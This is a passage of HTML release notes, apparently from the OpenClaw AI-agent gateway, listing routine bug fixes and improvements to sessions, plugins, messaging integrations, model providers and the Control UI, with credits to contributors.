<p>Control UI/Gateway: keep long-running dashboard WebSocket sessions alive with protocol pings and keep Stop available after reconnect or reload by recovering session-scoped active-run abort state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321259716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70991" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70991/hovercard" href="https://github.com/openclaw/openclaw/issues/70991">#70991</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</p>
</li>
<li>
<p>CLI/update: treat inherited Gateway service markers as origin hints and only block package replacement when the managed Gateway is still live, so self-updates can stop the service and continue safely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365329462" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75729" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75729/hovercard" href="https://github.com/openclaw/openclaw/pull/75729">#75729</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</p>
</li>
<li>
<p>Agents/failover: exempt run-level timeouts that fire during tool execution from model fallback, timeout-triggered compaction, and generic timeout payload synthesis, avoiding misleading "LLM request timed out" errors after the primary model has already responded. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115327379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52147" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52147/hovercard" href="https://github.com/openclaw/openclaw/issues/52147">#52147</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367303713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75873" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75873/hovercard" href="https://github.com/openclaw/openclaw/pull/75873">#75873</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonusa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonusa">@simonusa</a>.</p>
</li>
<li>
<p>Docker: copy Bun 1.3.13 from a digest-pinned image and keep CI on the same version. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350919036" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74356" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74356/hovercard" href="https://github.com/openclaw/openclaw/issues/74356">#74356</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Agents/compaction: keep prior context on consecutive turns against z.ai-style providers (z.ai direct, openrouter z-ai/*, in-house GLM gateways), avoiding accidental Pi state reset after successful turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368789014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76056/hovercard" href="https://github.com/openclaw/openclaw/pull/76056">#76056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>Doctor/plugins: run a one-time 2026.5.2 configured-plugin install repair based on <code>meta.lastTouchedVersion</code>, installing actively used downloadable OpenClaw plugins through the configured external source before marking the config touched for the release.</p>
</li>
<li>
<p>Sessions/transcripts: use one <code>session.writeLock.acquireTimeoutMs</code> policy for session transcript lock acquisitions and raise the default wait to 60 seconds, avoiding user-visible lock timeouts during legitimate slow prep, cleanup, compaction, and mirror work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529883" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75894" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75894/hovercard" href="https://github.com/openclaw/openclaw/issues/75894">#75894</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shandutta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shandutta">@shandutta</a>.</p>
</li>
<li>
<p>Control UI: contain the standalone iOS PWA viewport with safe-area-aware document locking, so Add-to-Home-Screen launches cannot scroll past the device bounds. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368888109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76072/hovercard" href="https://github.com/openclaw/openclaw/pull/76072">#76072</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kvncrw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kvncrw">@kvncrw</a>.</p>
</li>
<li>
<p>Agents/restart recovery: match cleaned transcript locks by exact transcript lock paths plus the canonical session fallback, so interrupted main sessions using topic-suffixed transcripts resume after gateway restart. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368769053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76052" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76052/hovercard" href="https://github.com/openclaw/openclaw/pull/76052">#76052</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anyech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anyech">@anyech</a>.</p>
</li>
<li>
<p>Agents/runtime: cache the stable system-prompt prefix and reuse prompt-report tool schema stats during dispatch prep, reducing repeated CPU work before streaming starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368424894" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75999/hovercard" href="https://github.com/openclaw/openclaw/issues/75999">#75999</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368807955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76061" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76061/hovercard" href="https://github.com/openclaw/openclaw/issues/76061">#76061</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zackchiutw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zackchiutw">@zackchiutw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/STLI69/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/STLI69">@STLI69</a>.</p>
</li>
<li>
<p>Control UI/WebChat: use high-contrast text selection colors so highlighted chat text stays visible across themes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204728608" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60850/hovercard" href="https://github.com/openclaw/openclaw/issues/60850">#60850</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204759217" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60854/hovercard" href="https://github.com/openclaw/openclaw/pull/60854">#60854</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Badschaff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Badschaff">@Badschaff</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>.</p>
</li>
<li>
<p>Telegram/native commands: pass persisted session files into plugin commands for topic-bound sessions, so <code>/codex bind</code> works from Telegram forum topics. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367067083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75845/hovercard" href="https://github.com/openclaw/openclaw/pull/75845">#75845</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368766599" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76049" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76049/hovercard" href="https://github.com/openclaw/openclaw/pull/76049">#76049</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MatthewSchleder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MatthewSchleder">@MatthewSchleder</a>.</p>
</li>
<li>
<p>Security audit/plugins: ignore plugin install backup, disabled, and dependency debris directories when enumerating installed plugin roots, avoiding false-positive findings for <code>.openclaw-install-backups</code> after plugin updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363085900" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75456/hovercard" href="https://github.com/openclaw/openclaw/issues/75456">#75456</a>.</p>
</li>
<li>
<p>Telegram: honor runtime conversation bindings for native slash commands in bound top-level groups, so commands like <code>/status@bot</code> route to the active non-<code>main</code> session instead of falling back to the default route. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362659532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75405/hovercard" href="https://github.com/openclaw/openclaw/issues/75405">#75405</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363728120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75558/hovercard" href="https://github.com/openclaw/openclaw/pull/75558">#75558</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ziptbm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ziptbm">@ziptbm</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Gateway/tasks: make task registry maintenance use pass-local backing-session lookups and fresh active child-session indexes, avoiding repeated full task snapshots and session-store clones on large stale registries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73517/hovercard" href="https://github.com/openclaw/openclaw/issues/73517">#73517</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365145364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75708" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75708/hovercard" href="https://github.com/openclaw/openclaw/issues/75708">#75708</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351414705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74406" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74406/hovercard" href="https://github.com/openclaw/openclaw/pull/74406">#74406</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365146597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75709" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75709/hovercard" href="https://github.com/openclaw/openclaw/pull/75709">#75709</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lightningxxl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lightningxxl">@Lightningxxl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/glfruit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/glfruit">@glfruit</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jared-rebel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jared-rebel">@jared-rebel</a>.</p>
</li>
<li>
<p>Auth/sessions: JSON-clone auth-profile cache/runtime snapshots and remaining session cleanup previews instead of using <code>structuredClone</code>, preserving mutation isolation while avoiding native-memory growth on large stores. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4073238042" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45438/hovercard" href="https://github.com/openclaw/openclaw/issues/45438">#45438</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markus-lassfolk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markus-lassfolk">@markus-lassfolk</a>.</p>
</li>
<li>
<p>Models CLI: restore <code>openclaw models list --provider &lt;id&gt;</code> catalog and registry fallback rows for unconfigured providers, so provider-specific verification commands no longer report "No models found." Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363447158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75517" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75517/hovercard" href="https://github.com/openclaw/openclaw/issues/75517">#75517</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364131001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75615/hovercard" href="https://github.com/openclaw/openclaw/pull/75615">#75615</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lotsoftick/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lotsoftick">@lotsoftick</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</p>
</li>
<li>
<p>Gateway/macOS: write LaunchAgent services with a canonical system PATH and stop preserving old plist PATH entries, so Volta, asdf, fnm, and pnpm shell paths no longer affect gateway child-process Node resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360722639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75233" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75233/hovercard" href="https://github.com/openclaw/openclaw/issues/75233">#75233</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360954515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75246" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75246/hovercard" href="https://github.com/openclaw/openclaw/pull/75246">#75246</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nphyde2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nphyde2">@nphyde2</a>.</p>
</li>
<li>
<p>Slack/hooks: preserve bot alert attachment text in message-received hook content when command text is blank. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368641515" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76035" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76035/hovercard" href="https://github.com/openclaw/openclaw/issues/76035">#76035</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368643379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76036" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76036/hovercard" href="https://github.com/openclaw/openclaw/pull/76036">#76036</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amsminn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amsminn">@amsminn</a>.</p>
</li>
<li>
<p>Sessions/agents: route Gateway session-store writes, CLI cleanup maintenance, and agent-delete session purges through a dedicated in-process writer and borrow the validated mutable cache during the writer slot, avoiding runtime file locks plus repeated <code>sessions.json</code> rereads and JSON clones on hot metadata updates. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288028893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68554/hovercard" href="https://github.com/openclaw/openclaw/pull/68554">#68554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/henkterharmsel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/henkterharmsel">@henkterharmsel</a>.</p>
</li>
<li>
<p>Control UI/chat: show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly instead of clearing the composer silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</p>
</li>
<li>
<p>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</p>
</li>
<li>
<p>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</p>
</li>
<li>
<p>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</p>
</li>
<li>
<p>TUI/chat: skip full provider model normalization during context-window warmup while preserving provider-owned context metadata, avoiding cold-start stalls with large model registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a>.</p>
</li>
<li>
<p>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</p>
</li>
<li>
<p>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</p>
</li>
<li>
<p>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</p>
</li>
<li>
<p>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</p>
</li>
<li>
<p>Codex/app-server: tolerate a second connection close during startup recovery and include retry counts plus stringified errors in the restart warning, so concurrent lanes do not fail after one shared-client race.</p>
</li>
<li>
<p>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</p>
</li>
<li>
<p>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, so thinking/tool follow-up turns do not fail with DeepSeek's replay-shape error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a>.</p>
</li>
<li>
<p>Anthropic-compatible streams: recover text deltas that arrive before their matching content block, so Kimi Code and similar providers do not finish as empty <code>incomplete_result</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</p>
</li>
<li>
<p>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>MCP/OpenAI: normalize parameter-free tool schemas whose top-level object <code>properties</code> is missing, null, or invalid before sending tools to OpenAI, so MCP tools without params stay usable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
